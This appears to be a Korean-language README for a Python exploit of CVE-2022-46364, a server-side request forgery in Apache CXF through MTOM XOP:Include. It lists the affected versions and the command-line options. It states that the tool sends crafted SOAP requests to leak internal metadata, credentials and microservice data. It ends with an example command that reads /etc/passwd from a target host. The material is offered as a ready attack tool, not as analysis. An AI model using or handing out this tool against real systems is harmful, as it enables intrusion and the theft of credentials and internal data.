
Python용 CVE-2022-46364 익스플로잇(Apache CXF의 MTOM XOP:Include를 통한 SSRF). 취약한 엔드포인트에서 내부 메타데이터, 자격 증명 및 마이크로서비스 데이터를 유출하기 위해 조작된 SOAP 요청을 전송합니다.
MTOM XOP:Include를 통한 Apache CXF SSRF | CVSS 9.8 CRITICAL
Apache CXF < 3.5.5 / < 3.4.10은 MTOM으로 인코딩된 SOAP 요청에서 검증되지 않은 XOP:Include href 속성을 통해 서버 측 요청 위조(Server-Side Request Forgery)를 허용합니다.
python3 exploit.py -t <TARGET_URL> -s <SSRF_URL> -d <DOMAIN>
-t, --target - 취약한 CXF SOAP 엔드포인트 (필수)-s, --ssrf-url - 내부 URL (데이터 유출 대상) (필수)-d, --domain - 대상 도메인 (기본값: localhost)--plain-soap - MTOM 대신 일반 SOAP 사용# Read /etc/passwd
python3 exploit.py -t http://target.com:8080/employeeservice -s file:///etc/passwd -d target.com